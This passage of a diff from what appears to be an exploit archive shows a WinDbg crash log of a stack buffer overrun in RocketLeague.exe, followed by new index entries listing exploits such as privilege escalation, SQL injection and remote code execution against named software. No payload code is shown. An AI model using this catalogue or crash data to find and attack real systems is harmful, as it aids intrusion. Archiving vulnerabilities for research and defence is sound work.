+VCRUNTIME140!memcmp+0xee: +00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi] +0:000> g +(3568.230c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE +RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: +00007ff6`4a660424 cd29 int 29h +0:000> .exr -1 +ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) + ExceptionCode: c0000409 (Security check failure or stack buffer overrun) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 0000000000000002 +Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE +0:000> u 00007ff64a660424 +RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: +00007ff6`4a660424 cd29 int 29h +00007ff6`4a660426 488d0d3303f600 lea rcx,[RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d678 (00007ff6`4b5c0760)] +00007ff6`4a66042d e8ca010000 call RocketLeague!AK::MemoryMgr::GetPoolName+0x8433c (00007ff6`4a6605fc) +00007ff6`4a660432 488b442438 mov rax,qword ptr [rsp+38h] +00007ff6`4a660437 4889051a04f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d770 (00007ff6`4b5c0858)],rax +00007ff6`4a66043e 488d442438 lea rax,[rsp+38h] +00007ff6`4a660443 4883c008 add rax,8 +00007ff6`4a660447 488905aa03f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d710 (00007ff6`4b5c07f8)],rax +0:000> kb 10 + # RetAddr : Args to Child : Call Site +00 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 +01 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f +02 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf +03 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 +04 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e +05 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe [d:\agent\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 114] +06 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b +07 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 +08 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 +09 efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0a fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e +0b efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0c fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e +0d efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0e fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e +0f efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0:000> !analyze -m +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +KEY_VALUES_STRING: 1 + + Key : Analysis.CPU.mSec + Value: 5640 + + Key : Analysis.DebugAnalysisManager + Value: Create + + Key : Analysis.Elapsed.mSec + Value: 6467 + + Key : Analysis.Init.CPU.mSec + Value: 400749 + + Key : Analysis.Init.Elapsed.mSec + Value: 1699165 + + Key : Analysis.Memory.CommitPeak.Mb + Value: 261 + + Key : FailFast.Name + Value: STACK_COOKIE_CHECK_FAILURE + + Key : FailFast.Type + Value: 2 + + Key : Timeline.OS.Boot.DeltaSec + Value: 215108 + + Key : Timeline.Process.Start.DeltaSec + Value: 1744 + + Key : WER.OS.Branch + Value: vb_release + + Key : WER.OS.Timestamp + Value: 2019-12-06T14:06:00Z + + Key : WER.OS.Version + Value: 10.0.19041.1 + + Key : WER.Process.Version + Value: 1.0.10897.0 + + +NTGLOBALFLAG: 0 +PROCESS_BAM_CURRENT_THROTTLED: 0 +PROCESS_BAM_PREVIOUS_THROTTLED: 0 +APPLICATION_VERIFIER_FLAGS: 0 + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) + ExceptionCode: c0000409 (Security check failure or stack buffer overrun) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 0000000000000002 +Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE + +FAULTING_THREAD: 0000230c +PROCESS_NAME: RocketLeague.exe +ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. +EXCEPTION_CODE_STR: c0000409 +EXCEPTION_PARAMETER1: 0000000000000002 + +STACK_TEXT: +00000098`52afda90 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 +00000098`52afdad0 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f +00000098`52afdb00 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf +00000098`52afdb30 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 +00000098`52afe240 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e +00000098`52afe9c8 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe +00000098`52afe9e0 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b +00000098`52afea20 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 +00000098`52afeab0 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 +... +... + +STACK_COMMAND: ~0s ; .cxr ; kb +SYMBOL_NAME: RocketLeague!AK::MemoryMgr::GetPoolName+84164 +MODULE_NAME: RocketLeague +IMAGE_NAME: RocketLeague.exe +FAILURE_BUCKET_ID: FAIL_FAST_STACK_BUFFER_OVERRUN_STACK_COOKIE_CHECK_FAILURE_MISSING_GSFRAME_c0000409_RocketLeague.exe!AK::MemoryMgr::GetPoolName +OS_VERSION: 10.0.19041.1 +BUILDLAB_STR: vb_release +OSPLATFORM_TYPE: x64 +OSNAME: Windows 10 +IMAGE_VERSION: 1.0.10897.0 +FAILURE_ID_HASH: {3e6f3f5b-25bb-68b3-2a5b-232743df7884} +Followup: MachineOwner \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 99bf55fb5..69baa14a2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6780,6 +6780,7 @@ id,file,description,date,author,type,platform,port 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple, 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple, 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php, +49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11315,6 +11316,10 @@ id,file,description,date,author,type,platform,port 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows, 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows, 49765,exploits/linux/local/49765.txt,"MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution",2021-04-14,"Central InfoSec",local,linux, +49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",2021-05-07,LiquidWorm,local,windows, +49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows, +49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows, +49848,exploits/windows/local/49848.txt,"Epic Games Rocket League 1.95 - Stack Buffer Overrun",2021-05-07,LiquidWorm,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44003,7 +44008,11 @@ id,file,description,date,author,type,platform,port 49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, -49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple, +49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Emircan Baş",webapps,multiple, 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple, 49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php, 49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php, +49843,exploits/php/webapps/49843.txt,"Voting System 1.0 - Authentication Bypass (SQLI)",2021-05-07,secure77,webapps,php, +49846,exploits/php/webapps/49846.txt,"Voting System 1.0 - Remote Code Execution (Unauthenticated)",2021-05-07,secure77,webapps,php, +49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php, +49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021",2021-05-07,"Tyler Butler",webapps,php,